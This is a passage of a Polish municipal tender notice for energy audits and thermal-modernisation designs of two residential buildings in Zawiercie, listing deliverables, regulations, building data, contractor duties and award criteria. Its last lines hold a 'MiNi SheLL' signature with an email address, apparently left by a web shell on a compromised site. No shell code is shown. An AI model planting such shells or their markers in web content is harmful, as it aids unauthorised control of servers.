10)wszystkie rysunki które znajdują się w projektach wraz z opisami, pisma, uzgodnienia itp. muszą znajdować się także  w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej,
11)Wykonawca załączy komplet niezbędnych uzgodnień z właścicielami mediów i ewentualnie inne, które umożliwią Zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na  budowę,
12)Przedmiot zamówienia należy dostarczyć w wersji tradycyjnej (papierowej)  oraz na nośniku elektronicznym w formacie plików pdf ( o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków technicznych i zdjęć powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Każdy tom przedmiotu zamówienia powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. Wszystkie rysunki, które znajdują się w projektach wraz z opisami, pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej.

Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.10.00-3, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2   
Wykonanie projektu termomodernizacji budynku przy ul. Pastewnej 6 w Zawierciu w ramach zadania pn.: Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Zawierciu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZADANIE NR 2 - Wykonanie projektu termomodernizacji  budynku przy ul. Pastewnej 6 w Zawierciu w ramach zadania pn.: Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Zawierciu.
Przedmiotem zamówienia jest: wykonanie:
1)audytu energetycznego,
2)projektu termomodernizacji - obejmuje wykonanie dokumentacji projektowej, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznej wykonania i odbioru robót budowlanych dla termomodernizacji budynku przy ul. Pastewnej 6 w Zawierciu w oparciu o wykonany audyt energetyczny.
Inwestor nie posiada dokumentacji budowlanej budynku. Opracowana dokumentacja będzie służyła do aplikowania o dofinansowanie w ramach Działania 4.3 Podrozdział 4.3.1 Efektywność energetyczna i odnawialne źródła energii w infrastrukturze publicznej i mieszkaniowej - ZIT.
Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami:
1)	rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (t. j. Dz. U. z 2013 r.  poz. 1129). 
2)	rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389).
3)	rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz. U. z 2002 r. nr 75, poz. 690). 
4)	Dyrektywą 2012/27/UE w sprawie efektywności energetycznej.

Dokumentacja powinna zawierać:
1.	projekt budowlany w 6 egz. w wersji papierowej, 1 egz. w wersji elektronicznej,
2.	projekt wykonawczy wszystkich branż w 3 egz. w  wersji papierowej, 1 egz. w wersji elektronicznej,
3.	przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar i robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w  § od 6 do 10 ww. rozporządzenia w 4 egzemplarzach w wersji papierowej  w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
4.	kosztorys inwestorski w 2 egz. w wersji papierowej, 1 egz. w wersji elektronicznej
5.	specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości  wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w 3 egzemplarzach. w  wersji papierowej, 1 egz. w  wersji elektronicznej.

Stan istniejący:
1.	Administratorem budynku zlokalizowanego przy ul. Pastewnej 6 jest Zakład Gospodarki Mieszkaniowej w Zawierciu.  Budynek składa się z trzech kondygnacji nadziemnych i jednej podziemnej. Obecnie budynek - mieszkania ogrzewane są piecami węglowymi.
2.	Budynek wyposażony jest w:
- instalację wodno-kanalizacyjną,
- elektryczną.   
3.	Zestawienie powierzchni:
a)	kubatura - 3 028,00 m3
b)	powierzchnia mieszkań - 448,22 m2
c)	powierzchnia lokali użytkowych - 78,00 m2
d)	łączna powierzchnia użytkowa - 526,22 m2
e)	łączna ilość lokali - 10 szt.
f)	ilość mieszkań-  8 szt.
g)	ilość lokali użytkowych - 2 szt.

Ponadto do obowiązków Wykonawcy należy: 
1)	sprawdzenie w terenie warunków wykonania zamówienia przed przystąpieniem do wykonania prac projektowych,
2)	uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora  zgłoszenia, 
3)	opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć ( wskazanie parametrów technicznych).
4)	konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy, a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia, 
5)	wsparcie merytoryczne Zamawiającego w trakcie prowadzonego postępowania na wyłonienie wykonawcy robót budowlanych w zakresie zagadnień związanych z  opracowaną dokumentacją projektową
6)	w projekcie  na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarze, kosztorysie inwestorskim i specyfikacji technicznej datę zapisywać jako dzień, miesiąc, rok,
7)	przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów,
8)	w przedmiarze i kosztorysie  inwestorskim należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót,
9)	przedmiary  robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania,
10)	wszystkie rysunki które znajdują się w projektach wraz z opisami, pisma, uzgodnienia itp. muszą znajdować się także  w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej,
11)	Wykonawca załączy komplet niezbędnych uzgodnień z właścicielami mediów i ewentualnie inne, które umożliwią Zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na  budowę.
12)	Przedmiot zamówienia należy dostarczyć w wersji tradycyjnej (papierowej)  oraz na nośniku elektronicznym w formacie plików pdf ( o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków technicznych i zdjęć powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Każdy tom przedmiotu zamówienia powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. Wszystkie rysunki, które znajdują się w projektach wraz z opisami, pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej.

Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.10.00-3, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3    
Wykonanie projektu termomodernizacji  budynku przy ul. Porębskiej 2 w Zawierciu w ramach zadania pn.: Termomodernizacja budynków mieszkalnych oraz użyteczności publicznej w Zawierciu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie:
1)	audytu energetycznego,
2)	projektu termomodernizacji - obejmuje wykonanie dokumentacji projektowej, przedmiaru robót, kosztorysu inwestorskiego, specyfikacji technicznej wykonania i odbioru robót budowlanych dla termomodernizacji budynku przy ul. Porębskiej 2 w Zawierciu w oparciu o wykonany audyt energetyczny.
Inwestor nie posiada dokumentacji budowlanej budynku.

Opracowana dokumentacja będzie służyła do aplikowania o dofinansowanie w ramach Działania 4.3 Podrozdział 4.3.1 Efektywność energetyczna i odnawialne źródła energii w infrastrukturze publicznej i mieszkaniowej - ZIT.

Przedmiot zamówienia należy wykonać zgodnie z n/w przepisami:
1) rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (t. j. Dz. U. z 2013 r.  poz. 1129), 
2) rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczenia planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym (Dz. U. z 2004 r. nr 130, poz. 1389),
3) rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie ( Dz. U. z 2002 r. nr 75, poz. 690), 
4) Dyrektywą 2012/27/UE w sprawie efektywności energetycznej.

Dokumentacja powinna zawierać:
1.	projekt budowlany w 6 egz. w wersji papierowej, 1 egz. w wersji elektronicznej,
2.	projekt wykonawczy wszystkich branż w 3 egz. w  wersji papierowej, 1 egz. w wersji elektronicznej,
3.	przedmiar robót przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót w kolejności technologicznej ich wykonania, wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem liczby jednostek miar i robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych nakładów rzeczowych. Przedmiar musi uwzględniać wymagania określone w  § od 6 do 10 ww. rozporządzenia w 4 egzemplarzach w wersji papierowej  w 4 egzemplarzach w wersji papierowej, 1 egz. w wersji elektronicznej,
4.	kosztorys inwestorski w 2 egz. w wersji papierowej, 1 egz. w wersji elektronicznej specyfikacja techniczna wykonania i odbioru robót budowlanych przez którą należy rozumieć opracowanie zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości  wykonania poszczególnych robót. Specyfikacja musi uwzględniać wymagania określone w § 13 i 14 w/w rozporządzenia w 3 egzemplarzach. w  wersji papierowej, 1 egz. w  wersji elektronicznej.

Stan istniejący:
1.	Administratorem budynku zlokalizowanego przy ul. Porębskiej 2 jest Zakład Gospodarki Mieszkaniowej w Zawierciu.  Budynek składa się z dwóch kondygnacji nadziemnych i jednej podziemnej. Obecnie budynek - mieszkania ogrzewane są piecami węglowymi.
Budynek wyposażony jest w:
- instalację wodno-kanalizacyjną,
- elektryczną.   
2.	Zestawienie powierzchni:
a)	kubatura - 3 155,00 m3;
b)	powierzchnia mieszkań - 412,44 m2;
c)	łączna powierzchnia użytkowa - 412,44 m2;
d)	łączna ilość lokali - 10 szt;
e)	ilość mieszkań -  10 szt.

Ponadto do obowiązków Wykonawcy należy: 
1)	sprawdzenie w terenie warunków wykonania zamówienia przed przystąpieniem do wykonania prac projektowych,
2)	uzyskanie wszelkich uzgodnień, zaświadczeń pozwalających na uzyskanie przez Inwestora  zgłoszenia, 
3)	opisywanie proponowanych materiałów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe i jedyną możliwością będzie podanie nazwy materiału lub urządzenia, wskazaniu temu muszą towarzyszyć wyrazy lub równoważny, wraz z określeniem co należy przez to rozumieć ( wskazanie parametrów technicznych).
4)	konsultacja z Zamawiającym istotnych rozwiązań konstrukcyjnych, funkcjonalnych i materiałowych mających wpływ na koszty robót budowlanych, które będą wykonywane na podstawie opracowanego przedmiotu umowy, a także przedłożenie ewentualnych propozycji rozwiązań nie ujętych a istotnych z punktu widzenia Wykonawcy dla prawidłowego wykonania zamówienia, 
5)	wsparcie merytoryczne Zamawiającego w trakcie prowadzonego postępowania na wyłonienie wykonawcy robót budowlanych w zakresie zagadnień związanych z  opracowaną dokumentacją projektową
6)	w projekcie  na stronie tytułowej oraz na wszystkich rysunkach następnie w przedmiarze, kosztorysie inwestorskim i specyfikacji technicznej datę zapisywać jako dzień, miesiąc, rok,
7)	przy podpisach (oprócz rysunków) należy przystemplować imienne pieczęcie projektantów,
8)	w przedmiarze i kosztorysie  inwestorskim należy uwzględnić zgodnie z Rozporządzeniem kod i nazwę wspólnego słownika zamówień podstawowych zakresów robót,
9)	przedmiary  robót podzielić należy na rozdziały wg. poszczególnych asortymentów robót oraz tabelę elementów scalonych. W przedmiarach oprócz wszystkich asortymentów robót należy również uwzględnić pełną obsługę geodezyjną zadania,
10)	wszystkie rysunki które znajdują się w projektach wraz z opisami, pisma, uzgodnienia itp. muszą znajdować się także  w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej,
11)	Wykonawca załączy komplet niezbędnych uzgodnień z właścicielami mediów i ewentualnie inne, które umożliwią Zamawiającemu zgłoszenie robót lub uzyskanie pozwolenia na  budowę.
12)	Przedmiot zamówienia należy dostarczyć w wersji tradycyjnej (papierowej)  oraz na nośniku elektronicznym w formacie plików pdf ( o jak najmniejszej pojemności z uwagi na konieczność zamieszczenia tych treści na stronie internetowej). Pliki muszą być zoptymalizowane pod względem rozmiaru; jakość zeskanowanych lub wygenerowanych dokumentów, rysunków technicznych i zdjęć powinny umożliwiać odczytanie wszystkich detali i cech, a jednocześnie uwzględniać i nie przekraczać rzeczywistej rozdzielczości biurowych urządzeń do wyświetlania i powielania danych. Każdy tom przedmiotu zamówienia powinien być zapisany do pojedynczego pliku - nazwa pliku powinna odzwierciedlać temat opracowania. Pliki muszą być wgrane do katalogu o nazwie określającej lokalizacje przedmiotu umowy. W tym samym katalogu musi być umieszczony plik w formacie tekstowym o nazwie SPIS.TXT, zawierający listę plików wraz z pełnymi tytułami opracowań w nich zawartych. Przedmiary robót powinny być zapisane w podkatalogu o nazwie przedmiary. Wszystkie rysunki, które znajdują się w projektach wraz z opisami, pisma, uzgodnienia itp. muszą znajdować się w wersji elektronicznej. Niedopuszczalne są zmiany bądź poprawki w dokumentacji bez ponownego, uwzględniającego te zmiany wykonania wersji elektronicznej.

Przedmiot zamówienia określa także wzór umowy, który stanowi załącznik do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.22.10.00-3, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 45.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin wykonania zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com